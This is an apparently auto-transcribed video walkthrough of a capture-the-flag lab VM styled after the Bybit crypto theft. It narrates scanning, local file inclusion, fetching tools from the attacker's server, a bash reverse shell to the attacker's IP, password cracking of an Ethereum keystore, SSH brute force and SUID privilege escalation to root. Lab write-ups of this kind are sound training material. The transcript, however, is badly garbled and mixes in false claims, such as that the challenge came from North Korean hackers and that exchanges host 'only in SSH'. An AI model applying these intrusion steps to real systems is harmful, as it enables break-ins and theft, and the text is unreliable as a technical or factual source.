Hello guys, welcome back to a Pentesting Club. Today we're going to solve another CTF challenge name called a Bybit uh, crypto safe cold wallet. This was a given for me a challenge from the North Korean hackers. So where they have given one CTF challenge to how to solve this a CTF challenge and how they have done this one. So we would like to discuss a step by step. Like a safe wallet is revealed by the cybersecurity incident that leads a Bybit like $1.5 billion. A crypto heist is highly a sophisticated and state-sponsored attack and stating the North Korean threat attacker behind the hack too and step to erase the traces and malicious activity in effort of hamper investigation efforts. Like we are going to doing as similar like as a North Korean hackers what they have did in the Bybit. So one of from the North Korean hacker he given that same CTF challenge. So how he was done, how he have access everything. Okay, so we would like to look everything from here. Now we can also look in this case like a multi-signature platform which has a rope with a Google Cloud mandate to perform like a forensic investigations and said attack in the work and hacking group dubbed and trader like a peer-to-peer which may be like that and even if you try to look like nodes in the blockchain nodes, so they can create their own node and you just need to connect to that blockchain. And what else you have, make a transactions like you have built a smart contract address, like I have built in Ethereum as one smart contract address. And I would like to tell a people uh, I would like to post in Telegram. Sorry, either Telegram or X post, otherwise a Reddit post or something else. So people they're going to come and purchase their validity. So I can get like a 0.001 ETH as a uh, like a for me as a revenue share earned by people like a similar in this case in real transactions in a banking system when you look at payment gateway. So in the payment gateway once you have charge, okay, like in the Stripe, PayPal or XYZ things, so they are going to detect like if you have $100 you try to send to your friend as $100, they will detect they will not detect you anything else but you have sent $100, but who is the person they have detected like 5 cents, otherwise $5, otherwise $10, like that. So the platform they take some little bit fees. So any type of smart contracts in across a blockchain network. And don't think about I have like anything like some other Ethereum blockchain and Solana, any type of blockchain network or crypto network. So they will take the charge for the platform. Like if you have built like Ethereum network, otherwise Algoda, otherwise Starlink, some other things like a Bitcoin. So they have owned their platforms to look up their services, everything, to charge a some little bit gas fee for their profit. That's it here also. Now, we would like to look now here. So what is the basic penetration testing methodologies we used here? So the basic penetration testing methodologies we used here: network discovery, enumeration, exploitation, privilege escalation, and capture this Ethereum smart contract address. We would like to crack that password. Okay, we would like to use the John the Ripper that's it to crack this one. So we would like to install a step-by-step tools and everything here. So this tool is very, very interesting, this CDR. So we would like to try to begin here. So first of all, you just type it as a sudo su, enter your password, then later you just type it as net discount minus I, hit 0. So first you would like to identify your target machine. So I have identified my target machine is here, 192.168.18.120. Now just type it as nmap minus t4 minus a and a scan and enter your target IP address. So now let's wait for the nmap result. So I have got now nmap result. So I can tell you any type of a platform like a blockchain, otherwise Coinbase, otherwise uh, Paxful, and I don't know some other things like Ethereum scan, uh, Ethereum, and these type of platforms like crypto.com, bitcoin.org, they are hosting only in the SSH. Don't you ever confuse? They are hosting only in the SSH. So this is the SSH. So maybe per year they can charge you like 80 to $120. So if you want a higher database, you just pay for $250. That you can get like 250 storage of gigabytes. Then they can store your data and send and do everything. So where they change, so where they purchase in the domain in like platform like GoDaddy, otherwise Namecheap, otherwise HostGator, otherwise I prefer not to say. There are multiple hosting platforms. So from there they can change only the name record, and hosting is from SSH. Okay, they just put their SSH IP address. That's it. So they will block the SSH for you, and they can get the private key like RSA key to access that server. That's it here. So sometimes they can put a Cloudflare also that you cannot able to see any type of results. Okay. Now let's if you want to look here as something, we would like to look here as what web uh, bybit.com. You can look here. What is the results we can get here? Connection is refused. You can see connection is refused. I prefer not to say. I not yet use the Bybit. We can look here as a Bybit. So here is a connection will be refused. You can look here because I am in attacker machines. So some countries it's maybe restricted. If it anything is high restricted, they will close it. Okay, no worries. So now we would like to dive into our main tutorial. So we have got one is available with SH, another one is available with port 80, that is in Nginx. So another one is available with the port 8000, that is with the Python FTPD lib. Okay, now we would like to come back here. Now you just enter what are it, right? Address 192.168.18.120. So this is just a simple uh, graphical user interfaces. That's it. So don't consider anything else. So let it consider this one as a Bybit. Now we would like to look here. So there is a lot of things, a phone info at the rate untitled TLD. So design with HTML up. So we would like to look the pesos. The pesos, there is nothing else with assets JavaScript index with main.js. Okay, this is great. Now we would like to go with this directory buster with HTTP. Enter our target type 192.168.18.120. Now we would like to try here. So here I have get only with as assets. So let's just copy this one, come back. We would like to look here. Here it is a forbidden. So we cannot able to access from here. Okay, we would like to look here. Let me just close. So I would like to go with as Nicto minus h. Then you just paste here as 192.168.18.11120. Then we would like to look this as Nicto scanner. Now we would like to go with as a gobuster directory minus u. Then let's just paste here as 192.168.80.120. Now, as word list is user share word list, then you just put here as directory buster, then you just put here as directory list 2.3 medium.txt. Now I need to get like as extensions like dot txt dot as, so I just put only as a dot, then I just put here as PHP. Then we would like to look here where I have got here as a readme.txt, a license.txt. Just copy this one. We would like to read this. It's not found. So we would like to look here HTML5 up net with HTML. Free the personal and commercial use for CCA license. This is massively a text heavy article oriented with a design build. So here we not get anything else, a demo with unflash.com, icons with front awesome.io, others. Okay. Now we just look here as a, oh sorry, I just quit this. Now we would like to look here as, so it was quitting here. Let's just copy this one as images. So it not found. We would like to look here as again this a license.txt. Now we would like to try here. So this is a license about the targeted website. Okay. So this Creative Commons organizations by license version 3.0. That's it. We not get any useful information. So uh, let's wait for this. Any useful informations we can get here. So in this case, I didn't get anything else. So wp-config.php, where it was found that contains a credentials. We would like to look this, just copy, come back. Now we would like to look here. So this is directly redirected to here only. There is nothing else from there. Okay. Now we would like to type here as clear. Now uh, we have tried this, but we didn't get any useful information. So now we would like to try with as a GoBuster. So otherwise, I just type here as, where I have here as a directory buster. So if no have, I would like to go and get as a directory search as a GitHub. I would like to get it from here as a directory search. So sometimes that may can give a direct way to perform, to find the right results of this one. So now we would like to go that. So I just know this. I just copy this one. So I would like to make directly as a Bybit. Now you just type your cd as a Bybit. Now just type it as a git clone and paste this repository and just clone this. Pass this directory search. So in this case, we just need to get, so it's a 50% is done. Now we would like to try here once we have get this. So now just type your cd as a directory search. Now let me just type it as clear. You just type plus minus f. Now we would like to type here as a Python 3. You just type here as a directory search. So I have already installed all my requirements here. You just type here as minus minus l. Let's see. Do you want direct search automatically install them? Yes. Now failed installs, try doing it manually. Okay. Now for a manual installation, so I just type it as source tool. So I would like to activate my virtual environment. Now let me I just type here as ls minus f. Now I just type here as pip3 install minus r requirements.txt. So in this case, but we didn't get any valid information from here. So we just need to try with this Google. So sometimes you may can see any type of targeted website like about contact and index.php like that only. So you need to get a something as a valuable things. So we just type here as yes. So it's install now. We just put minus u for the targeted URL. Let me just type here as clear. Let's just put here as a HTTP. Enter our target IP address 192.168.120. Now we would like to wait here. So you can look here. I have get now. So while we are trying with this, so but there is something with here. So but we not find what is that. So but here this is automatically can get it our results. So now just copy this one, come back. Let's just paste here. Now it was a forbidden. Okay, now I just copy this one entirely. Now let's go back. Admin with history access. Okay. So where we have got this as a admin with history access. So that's it. So where we have identified here as uploads with the dump SQL. So I would like to copy this one and I would like to note down. as for a reference, because in this case you cannot able to get anything else. So we are going to try a multiple things, so that's why. So we just copy this one. So now we just type here as a clear. Now we just type here as dot as admin. Then let's we would like to try here as again. Now let's we would like to look here as what we can get here. Admin HT access HTTP user. So we didn't get any useful information. So now you just type here as clear. Now I would like to go here as, let me just put here as, I would like to put here as a lower. So I would like to put here as a directory list. Directory list. I would like to put here as a lowercase 2.3. 2.3 a big dot text. So I would like to look this one. I would like to look here. So here I didn't get anything else, so now I just type it as ls minus a. Now let me just press it here. I would like to put a lowercase small. So I would like to put so I don't like to go as a that thing. Now I would like to go only with PHP. Let me just put here as dot as PHP. Then here is dot admin. Then we would like to try here as, now I have got here as a tool.php. So that's great. Let me just copy this one. Let's come back here. You just paste it here. This is a tool.php where I have got here now a tool.php. So now I think it's maybe a vulnerable now. I would like to try to fix this one. For fixing, we would like to utilize the same thing as here. Let me just fit here as let what you would like to put here as, now you just type here as a foo minus u is I would like to put here as minus u. Then your targeted domain, we would like to paste it here. Now tool.php, then you just write here as a foots equal to as a etc as password. That's it. Now we would like to present the same word list. Just copy, then let's just paste here as txt. I just put here as minus fs 0. Now I just got here as a file, so that's great. So where we have identified everything here, the parameter ID is f5. That's great. Now we would like to quit this. Now just copy this one, come back. We would like to go back here. Tool.php underscore, question mark a5 equal to what you just need to put here as a etc as a password. You can look here a root, then shell read, and where is the home with the jockey x and bin bash with the jockey x. Everything is right clear here. So where we have got it here as with the local file inclusion. So this is jockey message bus SHD LLO 567. So that's great. So now we would like to try to crack here. Now we would like to look here as this one has a little bit very good big. Now we would like to look here as so I would like to try as some other cases like etc hosters are something like I just put here as hosters like a local host with the zero trace. The following lines are desirable with IPv6 capable host, one local host with IPv6 and loop back, and all modes are present. So, where we have got this as hostess. Now, we would like to try here as now we would like to also look here as a proxy one the CMD line like just paste here where you can look here as ESP init. So where we have identified here a something as a reasonable. Now we would like to come back here. Now just type here as a CD. Let me just type here as a clear. Now here just type here as exit. Oh sorry. Uh, we just type here as clear. We just type cd as a bybit. Let me just type here as clear. So just type here as for I in. So you just need to write a simple a program 1 to 100. Now you just type here as a do for a curve. Now I would like to try this entirely just copy, come back. Let me just paste this. So I would like to put here as a $1 as in the command line. Now you just put as a output as a index dollars I. Then you just type it as a done. That's it. So parse the error near. Okay. So here we just need to parse this error. So we would like to go back here. So now I have got it here. Now we would like to look here. So what is the output we can see here? So let it try to go and get everything is clear. So after that we would like to try here. So it will take a somewhat a acceptations time. So we would like to wait for that until. So this was done. You just type here as clear. I just type here as plus minus L. So I have seen here a lot of index files. You can look here index files. So in this, so I just need to find the right valid credentials. That's it here. So for that, how you would like to try here to get the right valid credentials? So for that, you just type here as clear. You just type here as so I would like to try to remove the unwanted list. So for that, Let me just type here as clear. You just type here as a remove dollars. So you just open a bracket here. You just type here as a fine. Then you just put here as minus type for f minus size 0 c 2 is greater than Dave Arnold. Dave Arnold. So that's it. You just enter here, that's it. Now, you just type it as L plus minus L now. So, it's everything is deleted. So, I think we would like to uh, look very clearly. Let me just type. I would like to try here as one more time. Let me. I think I have made a mistake. Let me. We would like to try here as one more time. Let me just type it as clear. Now just go back this command. Index x and dollars I. Then we have done here. Now I think the mistake is from here. Not here also the mistake. We are doing as a curl with HTTP with admin tool.php under file. Then let it go for doing this one. So I want to know the output. We would like to go back here. As the output here is index dollars I. So that's great. Index dollars I. Now we would like to look this. I think it was done. I just type as clear. We just type as plus minus air. So this is a linked list file. Now I would like to try here. Let me just type it as clear. Now just type here as remove dollars and just put here as a fine question mark type minus f as a size as so I think is OC 2 is greater than Dave or null. That's also a great. Now I just type plus minus L. Okay. Now you just type you just put here as a cat index star no. So I think we have made here as somewhat a mistake here. So how I would like to go here for that here. We just look here as a C plus minus F. No, there is nothing else from here. Now, from here, we would like to here as, I would like to create here as make directory as a test. That's great. Go to here as a test. Now, we would like to go for here as a for I in 1 to 1,000 do a curve with HTTP where this is a output with as a index dollars. So the output must be greater. Then we would like to try here one more time. So once this is done, then later we would like to go further. So this CTF is not going to end until you make us very clearly. So let's we would like to try here as. So I think we can go and get it right now. So let's we would like to wait for this. So that was done. Now let's we just go for here. Now let's we just list minus F. So why it came as a tool.php? I think we not done as a right way. Remove as a tool.php. Now let me just type here as clear. Now we just type here as a for I in, let's we just type here as a 1 2 as a 1000. Let's we just do here as a do a curve with the HTTP broke a dollar I. So here is a mistake as a dollar I as CMD, then output as index.1. So now we have get it here without a fail. So dollar I. Now so I think we can get it here. You just type plus minus L. Yes. So I would like to put only the 0 now. Let's we would like to go back here. Now I just type here as what is this a go back remove find with a 0 is C, then Dave. Now I just type here as cat a index dot star. So now you can observe here everything is clearly. Now we have got everything. So you just need to try until you can get it here. So let me, I can study this. This is an SBIN init lib systemd and systemd as journal D. Then let's we would like to look this where uh, where www.html username is this as jockey x17. So this is the username, just copy. So where we have find here the right username and password. Let me just type come back here. Let me just type here as clear. Just type here as a sh jockey. Now we have here as such. So I told you from the beginning They are not hosted in cpanel, otherwise bulletproof panel, they can host only the SSH because for the secure thing. So you just enter our target IP address 192.168.18.120. That's it. They ask a permission, you just type yes. Now you just need to enter the jockey's password. So this is the jockey's password until here. So you just need to copy very clearly UHI2. So where there is an Python 3, so don't copy the Python 3 with XYZ thing. So you will get an error. So you just paste it here. So where we have login into their Bybit hosting of the cPanel. Now we would like to look here. Now this is password, and I would like to note down this for SSH. So just copy, come back. I just note down. So this work is done. So we have successfully cracked here. So now what we would like to do here is, now we just type here, you just type here as a ID, we get it here, you just type here as who am I, we have got here as a jockey 10x. So now we would like to go back here. This one is done. We just need to get this one access, and this is the root access to get into the system. So how we would like to exploit this one with the Ethereum? We would like to look here now from North Korea. Now we just type it as ls minus a. There is no useful information. If there is no useful information, so what we would like to do here is, we just type it as a sudo minus l. Let's just paste this password. Oh, sorry. So I just need to copy this password. This is a long lengthy password. So who hold, otherwise they develop, they don't provide Jackie may not run the sudo, otherwise sudo on zero trace. Okay, he is not going to run as a sudo. Okay, that's great. Now we would like to look as cd as I just go here as home tab. Now just type plus minus here. Now we would like to look here as a shell read. We would like to look here plus minus here. There is also nothing else. Now just type cd as LLO 4567. Permission denying door. So permission is denied. Okay. Now we would like to look here as cd where you just type plus minus here. Cd as www. You just type plus minus here. You just type cd dot html. You just type plus minus here. So we didn't get anything else except from here. Okay, we have got here as generic .html images, but that is also a forbidden. So we don't like anything else. So now we just go here as an op directory. Go back. Let me just type clear. We just go to here as opt. Now just type plus minus here. So here we can see here as a crypto vault. Now we would like to explore this one. What is available inside? Permission is denied. Okay. So permission is denied here. So now we would like to, nobody should read this. So we would like to go here. Either this is also a permission is denied or not denied. Nobody is denied. Now it's I would like to look here as a file destiny. It's ASCII. You just type here as cat a destiny. I don't know where it or they will take me, but I always know a Windows is a trash. From beginning onwards, I'm telling you, Windows is a trash. So Linux is the best operating system. So we have seen here. Now we would like to try here as if this one cannot get, now let me just put here as a div, or just type here as a ssm. Now just type plus minus a. Now I would like to try to run as a linkbase, otherwise pspy 64 GitHub. We would like to go and get to this. Uh, Dominica Looper PSPY. We would like to get this. So I would like to get as PSPY for a 64 version. Now, I would like to open this folder. I just, where is this? Come back. So this is download folders. So just cut this, come back, then just paste here. So where we have a link piece on PSPY. Now we would like to allow a some time to run this the temp directory. Now we would like to go to here as I would like to open a new tab. You just type cd. Now you just type plus minus plus. You just type as a python minus m http dot a server. Now we would like to go to here as a wget http enter what arbitrary IP address 192.168.18.120 and you just put here as a 0 linkbase.sh where it was get the linkbase. So in crypto that will be captured and they are presenting with the longitude or longitude. You can see here this is in S panel, but I can't able to study this. So why it's taking a lengthy time process for this? Let me just post this in this type plus here. Remove as a linkbase.sh. Now just type it as clear. PSPY as 64. So if this is not going to work out, let me just type it as a linkbase as a GitHub. Let me just go back here. So this is a linkbase one command line to execute this work. So It's not going to be a solving for that, so we just type it as clear. Now I just remove as PSPY as a 64 also. Now let me just, okay. So it not installed anything else from here as a curl, otherwise XYZ things from here. So for that, we would like to try to install everything from here. Like, let me, we would like to install here. So we would like to go to here as a cd, as a div, and shm. Now just type it as clear. Now, let me, either we would like to write, so uh, now just put here as nano as a upload.sh. Now, I would like to write here as a simple as exploit program to execute this one. So I just type it as bin bash, then I just put here as a download and chmod. Now, we would like to open this bracket. Now, let's just put here as a base URL equal to as a $1. Now let's just put here as a file equal to as $2. Now I just put here as wget, then put for as dollars as a base URL. So I would like to open with as a flower bracket this one. So it not getting any type of files to come inside. Just type it as a file. Here's a dollars. Now just put as a output as put for dollars as a file, and you just also need to be install the curl minus l. So where we would like to install the curl, then you just put for dollars as a base URL. So the administrator is disabled for this one. So we would like to write our own permissions. So I just copy and I just paste this. Now just put here as chmod plus x, only this dollars with 5. Now just type here as a read a paragraph. Now just type here as a enter the this URL for the download, for the downloads. Let's we just put here as a base URL. Now you just need to put here as a download chmod. So you just need to write this. Let me just put. So I want to download a linps, pspy, socat, curl, and nmap. So 2, this is 3, 4, as 5. Okay, this is great. We have get the 5. Now we just need to put here as a dollars as base URL. Now let me I just copy this one. I just put here. So base URL. This is completed now. Now once the base URL is done, now we just need to put here as a linbase.sh where this was done. Now next is pspy64. This is done. Now next as socat. This is done. Now we just type here as curl as AMD64. This is done. Now you just type here as nmap. This is also a done. Now you just put here as chmod plus x and star. That's it. Now just type Control O, Control X. Now you already as running this one. Everything as Python minus m http dot server. Once this is done, now you just try here as bash as a upload.sh. Enter the base URL to download. Is 192.168.18.122 and 8000. So car order no end contract. So let me I would like to try here as let me I just quit this, so I just write it as clear port 80. So I just try now here as 192.168.18.122. So I just write here as cat as upload.sh. So I would like to ask the ChatGPT because it's take a lengthy time process to solve this. So just write here as ChatGPT. So sometimes you just need to take a ChatGPT permissions to perform all these activities. Solve that issue. Copy. Solve that issue. Now, we would like to, it looks like you are encountering with a couple of issues in your script. A curl order encounter. This error, curl command is not found in your systems or available. Like this. Revised the script. With these fixes, you should accept a curl is not found and WC get should still work if neither is available. You might be installed necessary. So we would like to come back here. We just write it as clear. We just put here as nano. Let's let me just press this. You just type Control O, Control X. Now you just put here as chmod plus X as a upload.sh. Now just put here as bash as upload.sh. Enter the base URL from for the downloads. Enter your target. Type address 192.168.18.122. Yes, it was downloaded now. So where we have got here, but socket and curl order no end contract. So where we have got here a as everything, now just type plus minus L. So where we have everything now. So you don't need to worry now. You just type it as clear. You know, you just type it as bash as a linpiece dot sh. So now we would like to try with this linpiece. So sometimes a chat GPT is helpful for AI penetration. So we would like to look here. What is the error? You can get it here. So where we have got it as net filter, heap out a bounds is writable. So these are a CVE IDs we just need to try. Network file system is an open wall with a Bybit. So let's we would like to try this. Red and yellow is a 95% for process explorer vector. Red, you should be take a look out. Okay. So still taking us a long time. This is a virtual machine. Yes, it's a VMware. So we would like to wait for this. So all we have installed here. Let's see how long it may take. As long it may be take a container related tools is presented. If any is there any container? No. Any running containers? There is no any type of running containers. So it was stuck in the cloud only. So better, I would like to try as PSPY. That's only the best way. Because sometimes a link piece maybe can work out, sometimes link piece may not going to be work out. So how we would like to try here as let me just put this. So in this case, a link piece is not going to be work out. Now just type here as a PSPY as 64. Let me, I just running this. Now, spin init. So we have seen a before only this one as a spin init. So uh, from here we would like to try to get. So where is the output of this result? So we need to wait here as where we can look here as PyFTPD with the port is 8000 where www.html with Jackie Chan. Jackie, this is the password of that one. This is also a password. User bin database with the daemon system, address with the system D, no fork, no profile ID, a file, and system activation, and system logs. So where we have find here. Now, we would like to look this. Now, let's live with the system D. Now, I have got here a something useful information bin sh with the bin sh opt with the nobody should read this to a destiny. So where we have got it here as a destiny. So I just quit here. Now you just type here as id. So let me just put here as I just type here as id as 1003. Uh, Oh, sorry, it does not exist. 1003. So where I have got it here as a shell read. So that you can look here. ID is a shell read. So where we have got it here as a shell read. So he just choosing everything is very uh, closely. Now this is the file as a destiny. So we just need to take this as one. This one is as a node. So you just copy this one, come back. Now this as destiny. Now let's we just try here as just copy. Let me just paste it. Now what I would like to try here. Now we would like to go to here as opt to this one. Just copy this one. Let me just type here as clear. We just type here as C. Then let's just paste it here. Now let's we just type here as plus minus L. So this is as an destiny. So what you just need to type here. So you just need to type here in the before that, let me I just go to a temp directory. Now just type plus minus L. Okay. Now let I just come back here. I just type clear plus minus L. Now you just put here as nano as a temp as destiny. That's it. So here we would like to write here as a somewhat as exploit. I would like to come back here. So where this everything they have got here. Now just put this keyboard is interrupted. Uh, now I just put here as uh, like I can write here as a payload. You just put here as bash minus I is greater than and so otherwise you just need to go and get it from. So let me just look here as a list cat a shell dot sh. No, this is not important. You just type remove this h. So cat a backdoor dot php. Oh, sorry, cat a backdoor dot php. So this is a totally a different remove as a request. Just remove. So I would like to try to get it from as a Pentest monkey. We would like to walk to here as a Pentest monkey. Go to this a reverse cheat sheet. So this is the exploit. The first one. Let me just copy this one. Come back here. Let me just paste it here. Now I need to know what is my targeted IP address. So just look here as ifconfig. So my targeted always IP address is 192.68.18.122. Let's come back. You just put here as I just put as 9000. That's it. Then let's just paste your target IP address. That's it. Bash minus I. That's it. Where that's it here. Now just type come back here. Just type Control O, Control X. That's great. Now we have done here as a depth in the destiny. So now what you need to do here as we just type here as move as I would like to put here as let me just type here as clear netcat minus LVNP 9001. Now, like I just need to type here as move this as a temp for a destiny, as a destiny. I just type here as yes. Operation is not permitted. Okay. If operation is not permitted, now just put here as a copy. Operation is not permitted. So we cannot able to do this one. So I would like to try here as a luster, as destiny. So where I have like I and E for a destiny. Now we would like to try here as to try to find as minus PRM minus as 4000. Now like I just put here as plus minus air, is 2 is greater than as Dave or null. That's it. So I have here as a user being kata. So now we would like to use as a kata. So I would like to utilize here as a kata. So I just copy this one, come back, and just paste it here. A kata minus I as a destiny. Destiny. Now we just try with this as a luster as destiny. Before is I. Now I is removed, only is E. So it will be executable now. So now we would like to try as a move as 10. So it was moved. Now we would like to try here. We just wait here as a little bit some time. We would like to try to see how long it will take to try to connect this. So I have get a connected here. Now just need to type here as a ID. Now we have came to as a shell read. So now just type here as a shell equal to as a bin and bash. Now let's just here as a script minus q. Then you just put here as Dave or null. Dave or null. Now just type here as a export a term equal to extra. That's great. Now you just type here as less minus L. So now where we would like to go here is now we need to go to as a the main directory is the opt directory in this. So we would like to go to here as an opt directory. So where we can see here as a crypto wallet. So we just see here as opt. Now just try plus minus L. Now just try here as clear. We just try plus minus L. CD as a crypto. vault, crypto vault. So we came here as a crypto vault. So where we can see here as let me. We would like to go to as a first as a cd home directory. Now list minus l cd. So this is the username is 456 relative. Now just type list minus l. Now just type it as cat a user.txt. Permission is denied. So if permission is denied, and here we have like guess me as something and one. So we would like to study this, okay, one by one. So we would like to type it as clear. I just type this minus l. I would like to type it as a file as a guess me. Just copy this one, then I just press it here. With ASCII text, so I just type it as cat as guess me. User bin with FTP. So we don't have a passwords is matched. Okay, no worries. We just type it as clear. Just type plus minus here. We just type it as file as one. We just type it as cat as one. So we have got a somewhat useful information. Why don't we join to Universe and see who is the strongest person for this? So why we cannot able to crack this? Now, let's we just try this. Now, uh, we have got one thing here as somewhat a useful information. Uh, Now, let's we just go to here as a opt. Now just try plus minus here. Now just try crypto. Let me just paste it like this. Plus minus here. CD. So this Bybit of North Korean hackers. So it's extremely he have done a very great thing. So I just write here as anotes.txt. So they was written in Chinese, the flash. So I can't able to understand your Chinese language. I'm willing to say very clearly, I can't able to read a Chinese language. Very toughest language is Chinese and Russian language to understand. Oh, sorry, uh, Google Translate. So let's we would like to look what is the Google Translate which he was done. Let's we would like to go here. Let me just press it here. No, let me. I would like to go back first. Let me. I just type it as google.com. So I would like to convert this one into as English. It's better. Google Translate. We would like to go to as Google Translate. So I would like to paste this. I'm going to write down my wishes here. Complete the Rubik cube in 10 seconds. Make the flash run slower. Reach 1,000 views in Bilibili. I don't know this Chinese language. So these Chinese, they have created their own platform. For YouTube, they have Bilibili. For TikTok, they have some other things. So we cannot able to understand what's their thought. So everything they want their own. So now just type file as a secret. It's JSON text data. Now just type it as cat a secret. So where we have got it here. So this is an crypto wallet address. This is a cipher AS122 CTF. This is a ciphertext. And this is cipher graphs. where we have got it here, and KDF script. So where the North Korean hackers, they have cracked this one and they have stolen and they have get here everything. This is an ETH wallet address. So you just copy this entirely. Just copy. Now let's come back here. Just type plus minus here. Just come back. Just put here as now as a secret. Then let's just paste it this entirely. Now just type Ctrl O, Ctrl X. Now just put here as Ethereum. Ethereum. Ethereum to job. So I have Ethereum to job as a secret to as ETH hash dot txt. Warning, upon successful password recovery, this hash format may expose your private key. Do not share your extracted hashes with untrusted parties. Okay, that's great. Now, you can decrypt this one using the John trick. Like how we would like to go for as decryption. So for decryption, we would like to go and look. So we already have a look in the home as plus minus L C LL 40567. So oh, not here. So here, oh sorry, CD as home plus minus L C LL104567. I just type plus minus L. So now what we would like to type here as I just type here as clear. And I just type plus minus here. Just put here as cat a user.txt. It was permission is denied. We just put here as guess me. We just put here as cat1. Oh, cat1. So why don't we join the universe here? So this is like we would like to try to crack the password. It's like it will take a little bit lengthy time process to write here. So let's we would like to write. So I would like to add this a something as password. So we would like to look here as very clear. Now you just type here as so we need to try to crack this password first. So first of all, we would like to come back here. Now I would like to utilize as John minus minus as a word list equal to as user share as a word list. Then you just put here as a rocky.txt. That's it. Then you just put here as a ETH hash.txt. So we are going to cracking this password. We would like to look here. So this will take a lengthy time process to crack this password because it required a quantum computer to crack. Otherwise, you just need to have at least minimum like 256 GB of RAM. So it will crack you a faster. So this will take about more than like 6 minutes or 10 minutes to crack. So let we would like to. So I would like to prepare as some as a word list. Let me, I just come back here. Let me, I would like to create here as the password will become as a Dragon Balls or something else. So it may take a lengthy time process. So I just, without wasting time, I just need to go a further. So I just put here as a nano as password.txt. Now, let me, I would like to uh, add this one. So I would like to come back here, oh, not here. Let me, I would like to come back here. You just put here as ls minus l. Now just put here as cat as a 1. Now I just need to put here entirely this one. First, I just copy this one. Let me, I just go back here. Let me, I just paste here. Now, I would like to write one more time here also. Uh, so this will take you a lengthy time process to make it everything is clear. So I just need to put for a 2 times as this one. Now, I would like to write a password here as, let me, I would like to write the password here as a dragon balls. So this is the password. So that may take a lengthy time process here to come. So let me, I just go to here as, so let me, I would like to get as without confusion. So I just need to put as a beginning. Otherwise, let me, I can do one thing. I just put here as control O, control X. So you just put here as a mousepad as password.txt. That's it. Now let me just paste here as a beginning and the ending. You just need to add this for a combination. So I just add beginning and the ending. So once you go with as a terminal, that will take a lengthy time process to get a solve this work. So let's just paste it here. It's very easy. That's it. So you just click on save. Now just close this. So it's still as running here. Now what we would like to do here is, let me, I would like to come back here. So you just write there as a hydra minus L. So what is the username you are going to crack right now? This is the username. So this is the password is here. Let me, we would like to accessing entirely the cold wallet right now. So we just put for as password is password.txt. That's it. Now, then you just enter your target. IP address is 192.168.18.120 and you just type as such. That's it. Now, it may also take a little bit lengthy time process. So, but I have cracked as instantly the password. So where I have got this as a password. So here, this is taking a lengthy time process because if you lose the crypto coin, for recovery, it will take a lengthy time process. You don't know the password. If you try with the rocky.txt, if you try with the rememberable passwords, that will take a long and lengthy time process and time wasting also. And if you try with as a new purchase laptops or other things, your motherboard will be gone. So we have already the password, everything. We just copy this one. So now let's just copy this one. Let's come back here. Now we just type it as clear. We just type as SU. Then let's just paste it here. The password is this one. Let's Dragon Balls One Punch Man. Okay. So just paste it. So where I have came here directly here. Now we would like to look here as a list minus here. And I just type it as cat a user.txt. I have find the username, this user flag. Okay. Now you just type it as a sudo minus l, where there is a home with a guess me. So what is this a guess me? So in the guess me is there is nothing else to find. Also, we also look here as cat a guess me before. So there is a password. It will be caught. So we would like to try to get this one as a two ways as a password. So but FTP is not available for us. Its access is denied. And another one is we would like to put here as same thing as temp as a guess me. I just put as nano as temp as a guess me. Now we just put here as a bin bash. Now we just put here as a cat as a root. I would like to get the credentials. Now then I just put here as a chmod 4777 bin bash. Just type control. So this is not going to working out. So I just quit this. So it's not even working out. So if it quit, it will directly go. So we already know this a passwords everything. So we directly log in from here. So I just copy. So we can't able to go again everything. So I just press here 192.168.18.120. The password is this one. Just copy. Come back here. Then I just press it. Now here you can look here. You not even get anything else access here. Now, how we are going to get here? As now, just type. Let me just type it as clear. We just type it as sudo minus l, where we have got it here. We just type it as nano. Temp as a guess me. Now, we just type here as a bin bash. Now, in the bin bash, what you would like to try here? We just put here as a cat, as a root, as dot a credentials. Now we just put here as chmod. Now 4377 as bin bash. Just type control X. So where I have done this, so now just type here as clear. Now what you would like to do here is Now we just type here as a move from temp dot as a guess me to a guess me. So there is no a directly, no existence. So I would like to look this one. So sometimes it may be a confusion. This language cannot perform a start a no such file or directory. Okay. Now we just need to write go to here as a temp directory. Uh, then you just write plus minus here. Remove this a guess me dot swag. So sometimes this will not going to be work out. Now just type it as plus minus L. Now sudo minus L. We just put here as nano in the temp as a guess me. Now just write again as a bin bash. Now once you have done a bin bash, you just write here as cd as a root dot credentials. Now just type here as chmod 477 bin bash. That's it. You just type control control X. Now just type here as move from as a temp a guess me to here. Then uh, just put here as a guess me, and it will ask yes. Once you have done this, so once this is done, now just type here as cat as a guess me where we have done this. So now I just type here as again as sudo minus f where we have done this. Now we would like to take entirely this one. Let me just type clear. Now just look here as everything you have done here. Now we just try here as a sudo bin bash and go everything as a guess me. I have got here as a password of entire of the Bybit uh, cold wallet address. Okay, so you just copy this one. Now you just type here as now you just type plus minus LA as bin bash. So where we have here a bin bash. Now I just type as su uh, enter the uh, password. So we just paste here. So I have successfully came to a root of Bybit. Now so we have successfully take over entire of this Bybit wallet of $1.5 billion of crypto wallet with Ethereum. So this is take a lengthy time process. So you need to try very patiently until you get the crack this password. So I have only like 16 GB RAM PC. If you have NVIDIA, otherwise a high core a CPU PC, then you can try. So that will be work out for you very clearly. So even if you have like a Bitcoin core D, that also it may going to be work out, but you need to have high performance PC, otherwise uh, laptop. So don't purchase a laptop for cracking those Bitcoins. So your motherboard will be gone. So because of high temperature that not be efficient, even if you sit in the AC room, that will not be efficient. Your battery will be drained and motherboard will be out. So you can get only 1 year experience, 1 year validity for anything. So you cannot able to get anything else. So I just write as cd as a root plus minus l cat as a root.txt. So this is the wallet address and the uh, private key is this the password. dragon balls. So this will take a lengthy time process. That's it. So you try it your own, guys. Thank you guys for watching and keep smiling.